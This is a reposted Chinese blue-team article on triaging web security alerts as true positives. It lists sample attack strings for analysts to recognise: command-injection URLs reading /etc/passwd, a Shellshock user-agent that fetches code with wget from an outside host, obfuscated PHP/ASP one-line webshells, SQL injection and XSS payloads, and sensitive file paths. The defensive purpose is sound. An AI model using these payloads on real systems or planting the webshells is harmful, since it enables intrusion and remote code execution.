【蓝队】关于安全告警的正报样本

news/2025/3/1 11:44:46/文章来源:https://www.cnblogs.com/o-O-oO/p/18744668

样本一:命令执行

常见的命令攻击语句

GET /simple/tests/tmssql.php?do=phpinfo
GET /detail.php?id=/winnt/system32/cmd.exe?/c+dir+c:%5c
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/tmp/config/usr.ini
GET /cgi/maker/ptcmd.cgi?cmd=;cat+/etc/passwd

攻击语句出现在Get 、post请求 URL参数中,尝试通过cmd传递touch tmp.txt创建文件,属于攻击行为,正报。

尝试调用cmd执行dir命令,属于正报

样本二:扫描工具

在User-agent种存在awvs的UA头,判定为扫描工具AWVS发起,属于正报

还有其他的异常UA:

  • 恶意爬虫:Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)

  • 扫描器:morfeus fucking scanner、Accept: acunetix/wvs

  • sql注入漏洞:sqlmap/1.0.8.15#dev (http://sqlmap.org)

  • xss攻击:

'%22()%26%25<ScRiPt%20>prompt(961668)
  • 其它非常特殊攻击 :
User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

样本三:webshell通信

常见的一句话木马

<%eval request("sb")%><%execute request("sb")%><?php eval($_POST[sb]);?><?php @eval($_POST[sb]);?><?$_POST['sa']($_POST['sb']);?><?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?><%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("123"))%><%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("c")%>
#UTF-7编码格式的一句话木马<?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);?>

蚁剑连接webshell的数据包,属于正报,确实是攻击行为,是否成功需要观察回包

样本四:SQL注入

探测语句

http://www.xx.com/showdetail.asp?id=49 and 1=1
http://www.xx.com/showdetail.asp?id=49 or 1=1
and char(124)%2Buser%2Bchar(124)=0(注入类型判断)

权限判断

and user>0  用户名
and 1=(select IS_SRVROLEMEMBER('sysadmin'))  权限
and exists (select * from sysobjects)  数据库类型判断sqlserver

查询数据

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)  查库名
and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0  查表名
and (select count(字段名) from 表名)>0  猜字段
and (select top 1 len(username) from admin)=X  才字段值
http://localhost/mytest/sqlinject/?id=1+UNION+SELECT+1,password,3,username,5,6,7,8,9+FROM+user    union select猜解法
and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116

下面数据包中GET请求传递的参数存在sql探测语句和联合注入语句,判定为正报

下面数据包的POST请求传参,存在sql注入语句,属于正报,并且UA头属于sqlmap工具的UA头

下面属于宽字节注入。存在明显的SQL注入语句,系正报。

样本五:XSS攻击

常见的xss攻击语句

<script>alert("xss")</script>  #脚本
<img src="javascript:alert('xss');">  #属性
<img src="http://ha.ckers.org/xss.jpg">
<body onload=alert('xss')>  #事件
<div style="background-image: url(javascript:alert('xss'))">
<style type="text/javascript">alert('xss');</style>
<style>@import'javascript:alert("xss")';</style>
<link rel="stylesheet" href="http://ha.ckers.org/xss.css">

数据包中,GET型传参存在明显的XSS攻击语句,系正报

样本六:信息泄露

配置文件访问
httpd.conf
htaccess
HTPASSWD
boot.ini
etc/passwd
Php.ini
Web.xml

信息泄露攻击一般指的是读取敏感的文件

下面这个数据包就是尝试读取Windows系统C盘Windows目录下的win.ini文件,属于正报,是否成功需要看回包

尝试读取配置文件web.config,属于正报

样本七:敏感后缀及目录探测

特殊后缀
.mdb、 .sql
.bak、.sav、.old、.las
.tmp、.temp
.rar、.zip、.bz、gzip、tar
.conf、inc、ini、bat
.log、stats、statistics
Web.xml

样本八:应答报文提示信息

目录浏览:Parent Directory、Directory Listing For、Index of /、Welcome to the directory listing
错误信息:数据库错误信息、程序错误信息、错误信息、数据库错误信息、程序错误信息

下面是目录浏览漏洞的浏览器的展示

数据包的展示效果如下,也是存在目录浏览漏洞

图片

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/891498.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用idea的restClient功能

模拟http请求的restClient工具 post请求 get请求:

【蓝队】关于安全告警的误报样本

背景: 一些网站实现存在安全隐患,用户的一些正常流量,也可以被攻击者篡改,直接发起攻击。常见问题:url参数实现时直接传递sql语句 url参数实现时可以传递js脚本 url参数实现时用../进行目录穿越访问文件 url参数实现时直接调用一些系统函数 url参数可以进行域名重定向 系统…

RStudio 2024 软件下载与安装教程

【RStudio 2024 软件下载与安装教程】 1-安装包 扫描下方二维码关注「软知社」,后台回复【033】三位数字即可免费获取分享链接,无广告拒绝套路; 2-安装教程双击R-4.4.2-win.exe安装,弹窗安装对话框选择语言,点击确定点击下一步选择安装目录,选择C盘以外,点击下一步点击…

H3C路由器与Centos8对接L2TP

linux做为LNS 1.安装xl2tpd yum install -y xl2tpd 2.配置文件 vim /etc/xl2tpd/xl2tpd.confvim /etc/ppp/options.xl2tpdvim /etc/ppp/chap-secrets3.启动 systemctl restart xl2tpd.service systemctl enable xl2tpd.service4.添加路由 ip link add name veth1 type veth ip …

DeepSeek开源DeepGEMM:有哪些技术亮点?

近日,DeepSeek再次凭借开源举措惊艳众人,其发布的DeepGEMM,一款开源的FP8通用矩阵乘法库,为AI算力提升开辟了新路径。这已经是他们开源周的第三个项目,前两个是FlashMLA和DeepEP,各有千秋,但DeepGEMM,在我看来,才是真正捅破窗户纸的那一个。本文将深入剖析DeepGEMM的技…

Maple2023软件下载与安装教程

【Maple2023软件下载与安装教程】 1、安装包 扫描下方二维码关注「软知社」,后台回复【032】三位数字即可免费获取分享链接,无广告拒绝套路; 2、安装教程双击setup-windows.exe安装,弹窗安装对话框默认英语版本,点击下一步点击下一步选择I accept ,点击Next选择安装路径…

Lambda表达式的省略规则--java进阶day03

1.省略规则2.流程讲解 主方法中调用useStringhandler,该方法的形参是接口,所以我们要给实现类对象,这里我们使用匿名内部类 use...方法进栈,形参也是变量,接收到匿名内部类(如下图),相当于创建出接口对象,并且重写了方法,最后调用方法3.规则讲解 清楚了流程后,我们以…

记录win11安装CH341A驱动

在网上下载驱动包,打开setup.exe,点击安装插上编程器之后,打开设备管理器,找到设备,右击设备->属性->更新驱动程序->浏览我的电脑查找驱动程序->让我从计算机上的可用驱动程序列表中选取->端口(COM和LPT)->厂商选wch->选型号 选择完后,打开window…

陪玩程序源码,微信小程序中支付的实现

陪玩程序源码,微信小程序中支付的实现调用微信小程序支付需要携带以下几个参数,支付成功后在success成功的回调内做对应操作示例代码wx.requestPayment({timeStamp: 1414561699, // 时间戳,从 1970 年 1 月 1 日 00:00:00 至今的秒数,即当前的时间nonceStr: xxxxxx, //…

20250301 周末总结

1. 烧碱 无疑周初能否结束四浪回调 再次走出一波上涨突破2930才是有意义的。 非三即C 后市由心底的可能性还是较大 突破2930后 后市回调后会有一波涨势

Leetcode P2 两数相加

给你两个 非空 的链表,表示两个非负的整数。它们每位数字都是按照 逆序 的方式存储的,并且每个节点只能存储 一位 数字。 请你将两个数相加,并以相同形式返回一个表示和的链表。 你可以假设除了数字 0 之外,这两个数都不会以 0 开头。 示例 1:输入:l1 = [2,4,3], l2 = [5…

CH585NFC调试分享

沁恒推出了一款带有NFC的低功耗蓝牙芯片,在这里分享一些笔者调试的一些记录和经验。 沁恒在对应的例程中提供了PDF设计说明文档。虽然有文档但是仍然需要自己多去调试测试才能总结经验教训。 一、NFC天线的绘制要求PCB线圈的长宽视具体情况而定,如果电路板不受模具限制可设计…